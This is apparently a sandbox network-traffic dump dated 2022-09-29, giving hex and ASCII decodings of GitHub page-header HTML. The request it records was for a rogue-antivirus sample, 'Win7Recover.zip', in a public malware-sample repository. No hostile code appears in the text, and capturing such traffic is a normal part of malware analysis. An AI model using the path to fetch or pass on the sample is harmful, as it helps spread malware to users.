                                                                                                                                                2022-09-29 12:52:04 UTC37995INData Raw: 2e 34 39 2d 32 2e 30 31 2e 33 37 2d 32 2e 35 33 2d 2e 34 39 2d 32 2e 36 39 2d 2e 39 34 2d 2e 30 39 2d 2e 32 33 2d 2e 34 38 2d 2e 39 34 2d 2e 38 32 2d 31 2e 31 33 2d 2e 32 38 2d 2e 31 35 2d 2e 36 38 2d 2e 35 32 2d 2e 30 31 2d 2e 35 33 2e 36 33 2d 2e 30 31 20 31 2e 30 38 2e 35 38 20 31 2e 32 33 2e 38 32 2e 37 32 20 31 2e 32 31 20 31 2e 38 37 2e 38 37 20 32 2e 33 33 2e 36 36 2e 30 37 2d 2e 35 32 2e 32 38 2d 2e 38 37 2e 35 31 2d 31 2e 30 37 2d 31 2e 37 38 2d 2e 32 2d 33 2e 36 34 2d 2e 38 39 2d 33 2e 36 34 2d 33 2e 39 35 20 30 2d 2e 38 37 2e 33 31 2d 31 2e 35 39 2e 38 32 2d 32 2e 31 35 2d 2e 30 38 2d 2e 32 2d 2e 33 36 2d 31 2e 30 32 2e 30 38 2d 32 2e 31 32 20 30 20 30 20 2e 36 37 2d 2e 32 31 20 32 2e 32 2e 38 32 2e 36 34 2d 2e 31 38 20 31 2e 33 32 2d 2e 32 37
                                                                                                                                                Data Ascii: .49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27
                                                                                                                                                2022-09-29 12:52:04 UTC37996INData Raw: 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 65 78 2d 31 20 66 6c 65 78 2d 6f 72 64 65 72 2d 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 54 6f 67 67 6c 65 20 6e 61 76 69 67 61 74 69 6f 6e 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6a 73 2d 64 65 74 61 69 6c 73 2d 74 61 72 67 65 74 20 42 75 74 74 6f 6e 2d 2d 6c 69 6e 6b 20 42 75 74 74 6f 6e 2d 2d 6d 65 64 69 75 6d 20 42 75 74 74 6f 6e 20 64 2d 6c 67 2d 6e 6f 6e 65 20 63 6f 6c 6f 72 2d 66 67
                                                                                                                                                Data Ascii: </a> </div> <div class="flex-1 flex-order-2"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg
                                                                                                                                                2022-09-29 12:52:04 UTC37998INData Raw: 6d 73 2d 63 65 6e 74 65 72 20 66 6c 65 78 2d 6a 75 73 74 69 66 79 2d 62 65 74 77 65 65 6e 20 6a 73 2d 64 65 74 61 69 6c 73 2d 74 61 72 67 65 74 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 20 20 20 20 20 20 50 72 6f 64 75 63 74 0a 20 20 20 20 20 20 3c 73 76 67 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 63 68 65 76 72 6f 6e 2d 64 6f 77 6e 20 48 65 61 64
                                                                                                                                                Data Ascii: ms-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down Head
                                                                                                                                                2022-09-29 12:52:04 UTC37999INData Raw: 20 64 3d 22 4d 31 20 33 61 32 20 32 20 30 20 30 31 32 2d 32 68 36 2e 35 61 32 20 32 20 30 20 30 31 32 20 32 76 36 2e 35 61 32 20 32 20 30 20 30 31 2d 32 20 32 48 37 76 34 2e 30 36 33 43 37 20 31 36 2e 33 35 35 20 37 2e 36 34 34 20 31 37 20 38 2e 34 33 38 20 31 37 48 31 32 2e 35 76 2d 32 2e 35 61 32 20 32 20 30 20 30 31 32 2d 32 48 32 31 61 32 20 32 20 30 20 30 31 32 20 32 56 32 31 61 32 20 32 20 30 20 30 31 2d 32 20 32 68 2d 36 2e 35 61 32 20 32 20 30 20 30 31 2d 32 2d 32 76 2d 32 2e 35 48 38 2e 34 33 37 41 32 2e 39 33 38 20 32 2e 39 33 38 20 30 20 30 31 35 2e 35 20 31 35 2e 35 36 32 56 31 31 2e 35 48 33 61 32 20 32 20 30 20 30 31 2d 32 2d 32 56 33 7a 6d 32 2d 2e 35 61 2e 35 2e 35 20 30 20 30 30 2d 2e 35 2e 35 76 36 2e 35 61 2e 35 2e 35 20 30 20 30 30 2e
                                                                                                                                                Data Ascii: d="M1 3a2 2 0 012-2h6.5a2 2 0 012 2v6.5a2 2 0 01-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 012-2H21a2 2 0 012 2V21a2 2 0 01-2 2h-6.5a2 2 0 01-2-2v-2.5H8.437A2.938 2.938 0 015.5 15.562V11.5H3a2 2 0 01-2-2V3zm2-.5a.5.5 0 00-.5.5v6.5a.5.5 0 00.
                                                                                                                                                2022-09-29 12:52:04 UTC38000INData Raw: 2e 37 35 20 30 20 30 30 2d 2e 38 37 35 2d 31 2e 35 31 35 4c 31 32 2e 38 37 36 2e 36 33 39 7a 6d 2d 31 20 31 2e 32 39 38 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 32 35 20 30 6c 37 2e 36 32 35 20 34 2e 34 30 32 2d 37 2e 37 35 20 34 2e 34 37 34 2d 37 2e 37 35 2d 34 2e 34 37 34 20 37 2e 36 32 35 2d 34 2e 34 30 32 7a 4d 33 2e 35 30 31 20 37 2e 36 34 76 38 2e 38 30 33 63 30 20 2e 30 39 2e 30 34 38 2e 31 37 32 2e 31 32 35 2e 32 31 36 6c 37 2e 36 32 35 20 34 2e 34 30 32 76 2d 38 2e 39 34 37 4c 33 2e 35 30 31 20 37 2e 36 34 7a 6d 39 2e 32 35 20 31 33 2e 34 32 31 6c 37 2e 36 32 35 2d 34 2e 34 30 32 61 2e 32 35 2e 32 35 20 30 20 30 30 2e 31 32 35 2d 2e 32 31 36 56 37 2e 36 33 39 6c 2d 37 2e 37 35 20 34 2e 34 37 34 76 38 2e 39 34 37 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c
                                                                                                                                                Data Ascii: .75 0 00-.875-1.515L12.876.639zm-1 1.298a.25.25 0 01.25 0l7.625 4.402-7.75 4.474-7.75-4.474 7.625-4.402zM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947L3.501 7.64zm9.25 13.421l7.625-4.402a.25.25 0 00.125-.216V7.639l-7.75 4.474v8.947z"></path><
                                                                                                                                                2022-09-29 12:52:04 UTC38002INData Raw: 34 2e 36 33 37 7a 6d 2d 2e 36 31 37 20 31 2e 34 32 36 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 31 35 34 20 30 6c 38 2e 32 35 20 32 2e 36 37 36 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 31 37 33 2e 32 33 37 56 31 30 63 30 20 35 2e 34 36 31 2d 33 2e 32 38 20 39 2e 34 38 33 2d 38 2e 34 33 20 31 31 2e 34 32 36 61 2e 32 2e 32 20 30 20 30 31 2d 2e 31 34 20 30 43 36 2e 37 38 20 31 39 2e 34 38 33 20 33 2e 35 20 31 35 2e 34 36 20 33 2e 35 20 31 30 56 34 2e 39 37 36 63 30 2d 2e 31 30 38 2e 30 36 39 2d 2e 32 30 33 2e 31 37 33 2d 2e 32 33 37 6c 38 2e 32 35 2d 32 2e 36 37 36 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6f 72 2d 66 67 2d 64 65 66 61 75 6c 74 20
                                                                                                                                                Data Ascii: 4.637zm-.617 1.426a.25.25 0 01.154 0l8.25 2.676a.25.25 0 01.173.237V10c0 5.461-3.28 9.483-8.43 11.426a.2.2 0 01-.14 0C6.78 19.483 3.5 15.46 3.5 10V4.976c0-.108.069-.203.173-.237l8.25-2.676z"></path></svg> <div> <div class="color-fg-default
                                                                                                                                                2022-09-29 12:52:04 UTC38003INData Raw: 34 7a 6d 31 2e 37 35 2d 2e 32 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2d 2e 32 35 2e 32 35 76 34 63 30 20 2e 31 33 38 2e 31 31 32 2e 32 35 2e 32 35 2e 32 35 68 31 37 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2e 32 35 2d 2e 32 35 76 2d 34 61 2e 32 35 2e 32 35 20 30 20 30 30 2d 2e 32 35 2d 2e 32 35 48 33 2e 32 35 7a 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 30 20 31 37 2e 37 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2e 37 35 2d 2e 37 35 68 36 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 31 30 20 31 2e 35 68 2d 36 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 2e 37 35 2d 2e 37 35 7a 6d 2d 34 20 30 61 2e 37 35 2e 37 35 20 30 20 30 31 2e 37 35 2d 2e 37 35 68 2e 35 61 2e 37 35 2e 37 35 20 30 20
                                                                                                                                                Data Ascii: 4zm1.75-.25a.25.25 0 00-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 00.25-.25v-4a.25.25 0 00-.25-.25H3.25z"></path><path fill-rule="evenodd" d="M10 17.75a.75.75 0 01.75-.75h6.5a.75.75 0 010 1.5h-6.5a.75.75 0 01-.75-.75zm-4 0a.75.75 0 01.75-.75h.5a.75.75 0
                                                                                                                                                2022-09-29 12:52:04 UTC38004INData Raw: 20 33 2e 33 36 38 20 30 20 2e 33 36 38 2e 30 31 34 2e 37 33 33 2e 30 35 32 20 31 2e 30 38 36 6c 2d 2e 36 33 33 20 31 2e 34 37 38 2d 2e 30 34 33 2e 30 32 32 41 34 2e 37 35 20 34 2e 37 35 20 30 20 30 30 30 20 31 35 2e 32 32 32 76 31 2e 30 32 38 63 30 20 2e 35 32 39 2e 33 31 2e 39 38 37 2e 35 36 34 20 31 2e 32 39 33 2e 32 38 2e 33 33 36 2e 36 33 37 2e 36 35 33 2e 39 36 37 2e 39 31 38 61 31 33 2e 32 36 32 20 31 33 2e 32 36 32 20 30 20 30 30 31 2e 32 39 39 2e 39 31 31 6c 2e 30 32 34 2e 30 31 35 2e 30 30 36 2e 30 30 34 2e 30 34 2e 30 32 35 2e 31 34 34 2e 30 38 37 63 2e 31 32 34 2e 30 37 33 2e 33 30 34 2e 31 37 37 2e 35 33 35 2e 33 2e 34 36 2e 32 34 35 20 31 2e 31 32 32 2e 35 37 20 31 2e 39 34 32 2e 38 39 34 43 37 2e 31 35 35 20 32 31 2e 33 34 34 20 39 2e 34 33
                                                                                                                                                Data Ascii: 3.368 0 .368.014.733.052 1.086l-.633 1.478-.043.022A4.75 4.75 0 000 15.222v1.028c0 .529.31.987.564 1.293.28.336.637.653.967.918a13.262 13.262 0 001.299.911l.024.015.006.004.04.025.144.087c.124.073.304.177.535.3.46.245 1.122.57 1.942.894C7.155 21.344 9.43
                                                                                                                                                2022-09-29 12:52:04 UTC38006INData Raw: 37 2e 32 30 33 20 37 2e 32 30 33 20 30 20 30 31 2d 2e 30 39 20 31 2e 30 37 39 63 2d 2e 31 34 33 2e 39 36 37 2d 2e 34 30 36 20 31 2e 37 35 34 2d 2e 38 35 31 20 32 2e 33 30 31 7a 6d 32 2e 35 30 34 2d 32 2e 34 39 37 61 37 2e 31 37 34 20 37 2e 31 37 34 20 30 20 30 31 2d 2e 30 36 33 2d 2e 38 39 34 76 2d 2e 30 32 63 2e 30 30 31 2d 2e 37 37 2e 31 37 2d 31 2e 32 37 2e 34 33 38 2d 31 2e 35 37 38 2e 33 34 31 2d 2e 33 39 20 31 2e 30 34 36 2d 2e 36 39 20 32 2e 35 33 33 2d 2e 35 32 39 20 31 2e 35 30 36 2e 31 36 33 20 32 2e 33 34 37 2e 35 33 37 20 32 2e 38 32 34 20 31 2e 30 32 35 2e 34 36 32 2e 34 37 32 2e 37 30 35 20 31 2e 31 37 39 2e 37 30 35 20 32 2e 33 31 39 20 30 20 31 2e 32 31 2d 2e 31 37 34 20 31 2e 39 32 36 2d 2e 35 35 38 20 32 2e 33 36 31 2d 2e 33 36 35 2e 34
                                                                                                                                                Data Ascii: 7.203 7.203 0 01-.09 1.079c-.143.967-.406 1.754-.851 2.301zm2.504-2.497a7.174 7.174 0 01-.063-.894v-.02c.001-.77.17-1.27.438-1.578.341-.39 1.046-.69 2.533-.529 1.506.163 2.347.537 2.824 1.025.462.472.705 1.179.705 2.319 0 1.21-.174 1.926-.558 2.361-.365.4
                                                                                                                                                2022-09-29 12:52:04 UTC38007INData Raw: 2d 32 2e 37 7a 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 2e 35 20 34 2e 32 35 63 30 2d 2e 39 36 36 2e 37 38 34 2d 31 2e 37 35 20 31 2e 37 35 2d 31 2e 37 35 68 31 37 2e 35 63 2e 39 36 36 20 30 20 31 2e 37 35 2e 37 38 34 20 31 2e 37 35 20 31 2e 37 35 76 31 32 2e 35 61 31 2e 37 35 20 31 2e 37 35 20 30 20 30 31 2d 31 2e 37 35 20 31 2e 37 35 68 2d 39 2e 36 39 6c 2d 33 2e 35 37 33 20 33 2e 35 37 33 41 31 2e 34 35 37 20 31 2e 34 35 37 20 30 20 30 31 35 20 32 31 2e 30 34 33 56 31 38 2e 35 48 33 2e 32 35 61 31 2e 37 35 20 31 2e 37 35 20 30 20 30 31 2d 31 2e 37 35 2d 31 2e 37 35 56 34 2e 32 35 7a 4d 33 2e 32 35 20 34 61 2e 32 35 2e 32 35 20 30 20 30 30 2d 2e 32 35 2e 32 35 76 31 32 2e 35
                                                                                                                                                Data Ascii: -2.7z"></path><path fill-rule="evenodd" d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 01-1.75 1.75h-9.69l-3.573 3.573A1.457 1.457 0 015 21.043V18.5H3.25a1.75 1.75 0 01-1.75-1.75V4.25zM3.25 4a.25.25 0 00-.25.25v12.5
                                                                                                                                                2022-09-29 12:52:04 UTC38008INData Raw: 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6f 72 2d 66 67 2d 64 65 66 61 75 6c 74 20 68 34 22 3e 49 73 73 75 65 73 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 50 6c 61 6e 20 61 6e 64 20 74 72 61 63 6b 20 77 6f 72 6b 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 0a 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 64 72 6f 70 64 6f 77 6e 2d 6c 69 6e 6b 20 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 70 79 2d 32 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22
                                                                                                                                                Data Ascii: div class="color-fg-default h4">Issues</div> Plan and track work </div> </a></li> <li> <a class="HeaderMenu-dropdown-link lh-condensed d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center"
                                                                                                                                                2022-09-29 12:52:04 UTC38010INData Raw: 2e 32 32 6c 32 2e 37 32 20 32 2e 37 32 76 2d 32 2e 31 39 61 2e 37 35 2e 37 35 20 30 20 30 31 2e 37 35 2d 2e 37 35 68 32 61 2e 32 35 2e 32 35 20 30 20 30 30 2e 32 35 2d 2e 32 35 76 2d 39 2e 35 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6f 72 2d 66 67 2d 64 65 66 61 75 6c 74 20 68 34 22 3e 44 69 73 63 75 73 73 69 6f 6e 73 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 43 6f 6c 6c 61 62 6f 72 61 74 65 20 6f 75 74 73 69 64 65 20 6f 66 20 63 6f 64 65 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 0a 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 6c 69 73
                                                                                                                                                Data Ascii: .22l2.72 2.72v-2.19a.75.75 0 01.75-.75h2a.25.25 0 00.25-.25v-9.5z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div> </a></li> </ul> <ul class="lis
                                                                                                                                                2022-09-29 12:52:04 UTC38011INData Raw: 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 6c 69 6e 6b 2d 65 78 74 65 72 6e 61 6c 20 48 65 61 64 65 72 4d 65 6e 75 2d 65 78 74 65 72 6e 61 6c 2d 69 63 6f 6e 20 63 6f 6c 6f 72 2d 66 67 2d 73 75 62 74 6c 65 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 30 2e 36 30 34 20 31 68 34 2e 31 34 36 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 32 35 2e 32 35 76 34 2e 31 34 36 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 34 32 37 2e 31 37 37 4c 31 33 2e 30 33 20 34 2e 30 33 20 39 2e 32 38 20 37 2e 37 38 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 30 36 2d 31 2e 30 36 6c 33 2e 37 35 2d 33 2e 37 35 2d 31 2e 35 34 33
                                                                                                                                                Data Ascii: -view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path fill-rule="evenodd" d="M10.604 1h4.146a.25.25 0 01.25.25v4.146a.25.25 0 01-.427.177L13.03 4.03 9.28 7.78a.75.75 0 01-1.06-1.06l3.75-3.75-1.543
                                                                                                                                                2022-09-29 12:52:04 UTC38012INData Raw: 2e 37 35 20 32 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 32 20 33 2e 37 35 76 38 2e 35 63 30 20 2e 39 36 36 2e 37 38 34 20 31 2e 37 35 20 31 2e 37 35 20 31 2e 37 35 68 38 2e 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 31 34 20 31 32 2e 32 35 76 2d 33 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 30 2d 31 2e 35 20 30 76 33 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 32 35 2e 32 35 68 2d 38 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 32 35 2d 2e 32 35 76 2d 38 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 32 35 2d 2e 32 35 68 33 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 30 30 2d 31 2e 35 68 2d 33 2e 35 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 3c 61 20
                                                                                                                                                Data Ascii: .75 2A1.75 1.75 0 002 3.75v8.5c0 .966.784 1.75 1.75 1.75h8.5A1.75 1.75 0 0014 12.25v-3.5a.75.75 0 00-1.5 0v3.5a.25.25 0 01-.25.25h-8.5a.25.25 0 01-.25-.25v-8.5a.25.25 0 01.25-.25h3.5a.75.75 0 000-1.5h-3.5z"></path></svg></a></li> <li> <a
                                                                                                                                                2022-09-29 12:52:04 UTC38014INData Raw: 72 65 6c 61 74 69 76 65 20 66 6c 65 78 2d 77 72 61 70 20 66 6c 65 78 2d 6a 75 73 74 69 66 79 2d 62 65 74 77 65 65 6e 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 64 2d 62 6c 6f 63 6b 20 64 2d 6c 67 2d 66 6c 65 78 20 66 6c 65 78 2d 6c 67 2d 6e 6f 77 72 61 70 20 66 6c 65 78 2d 6c 67 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 6a 73 2d 64 65 74 61 69 6c 73 2d 63 6f 6e 74 61 69 6e 65 72 20 6a 73 2d 68 65 61 64 65 72 2d 6d 65 6e 75 2d 69 74 65 6d 22 3e 0a 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 6c 69 6e 6b 20 62 6f 72 64 65 72 2d 30 20 77 69 64 74 68 2d 66 75 6c 6c 20 77 69 64 74 68 2d 6c 67 2d 61 75 74 6f 20 70 78 2d 30 20 70 78 2d 6c 67 2d 32 20 70 79 2d 33
                                                                                                                                                Data Ascii: relative flex-wrap flex-justify-between flex-items-center d-block d-lg-flex flex-lg-nowrap flex-lg-items-center js-details-container js-header-menu-item"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3
                                                                                                                                                2022-09-29 12:52:04 UTC38015INData Raw: 77 2f 6d 61 73 74 65 72 2f 72 6f 67 75 65 73 2f 57 69 6e 37 52 65 63 6f 76 65 72 2e 7a 69 70 3b 72 65 66 5f 63 74 61 3a 45 6e 74 65 72 70 72 69 73 65 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 65 6e 74 65 72 70 72 69 73 65 22 3e 0a 20 20 20 20 20 20 45 6e 74 65 72 70 72 69 73 65 0a 0a 20 20 20 20 0a 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 64 72 6f 70 64 6f 77 6e 2d 6c 69 6e 6b 20 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 70 79 2d 32 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63
                                                                                                                                                Data Ascii: w/master/rogues/Win7Recover.zip;ref_cta:Enterprise;&quot;}" href="/enterprise"> Enterprise </a></li> <li> <a class="HeaderMenu-dropdown-link lh-condensed d-block no-underline position-relative py-2 Link--secondary" data-analytic
                                                                                                                                                2022-09-29 12:52:04 UTC38016INData Raw: 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 53 6f 6c 75 74 69 6f 6e 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 43 49 2f 43 44 20 26 61 6d 70 3b 61 6d 70 3b 20 41 75 74 6f 6d 61 74 69 6f 6e 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 45 6e 64 65 72 6d 61 6e 63 68 2f 4d 61 6c 77 61 72 65 44 61 74 61 62 61 73 65 2f 72 61 77 2f 6d 61 73 74 65 72 2f 72 6f 67 75 65 73 2f 57 69 6e 37 52 65 63 6f 76 65 72 2e 7a 69 70 3b 72 65 66 5f 63 74 61 3a 43 49 2f 43 44 20 26 61 6d 70 3b 61 6d 70 3b 20 41 75 74 6f 6d 61 74 69 6f 6e 3b 26 71 75 6f 74 3b 7d 22 20 68 72
                                                                                                                                                Data Ascii: r dropdown (logged out), Solutions&quot;,&quot;action&quot;:&quot;click to go to CI/CD &amp;amp; Automation&quot;,&quot;label&quot;:&quot;ref_page:/Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zip;ref_cta:CI/CD &amp;amp; Automation;&quot;}" hr
                                                                                                                                                2022-09-29 12:52:04 UTC38018INData Raw: 69 74 68 75 62 2e 63 6f 6d 2f 64 65 76 6f 70 73 2f 22 3e 0a 20 20 20 20 20 20 44 65 76 4f 70 73 0a 0a 20 20 20 20 3c 73 76 67 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 6c 69 6e 6b 2d 65 78 74 65 72 6e 61 6c 20 48 65 61 64 65 72 4d 65 6e 75 2d 65 78 74 65 72 6e 61 6c 2d 69 63 6f 6e 20 63 6f 6c 6f 72 2d 66 67 2d 73 75 62 74 6c 65 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22
                                                                                                                                                Data Ascii: ithub.com/devops/"> DevOps <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path fill-rule="evenodd"
                                                                                                                                                2022-09-29 12:52:04 UTC38019INData Raw: 30 2e 36 30 34 20 31 68 34 2e 31 34 36 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 32 35 2e 32 35 76 34 2e 31 34 36 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 34 32 37 2e 31 37 37 4c 31 33 2e 30 33 20 34 2e 30 33 20 39 2e 32 38 20 37 2e 37 38 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 30 36 2d 31 2e 30 36 6c 33 2e 37 35 2d 33 2e 37 35 2d 31 2e 35 34 33 2d 31 2e 35 34 33 41 2e 32 35 2e 32 35 20 30 20 30 31 31 30 2e 36 30 34 20 31 7a 4d 33 2e 37 35 20 32 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 32 20 33 2e 37 35 76 38 2e 35 63 30 20 2e 39 36 36 2e 37 38 34 20 31 2e 37 35 20 31 2e 37 35 20 31 2e 37 35 68 38 2e 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 31 34 20 31 32 2e 32 35 76 2d 33 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 30 2d 31 2e 35 20 30 76 33 2e
                                                                                                                                                Data Ascii: 0.604 1h4.146a.25.25 0 01.25.25v4.146a.25.25 0 01-.427.177L13.03 4.03 9.28 7.78a.75.75 0 01-1.06-1.06l3.75-3.75-1.543-1.543A.25.25 0 0110.604 1zM3.75 2A1.75 1.75 0 002 3.75v8.5c0 .966.784 1.75 1.75 1.75h8.5A1.75 1.75 0 0014 12.25v-3.5a.75.75 0 00-1.5 0v3.
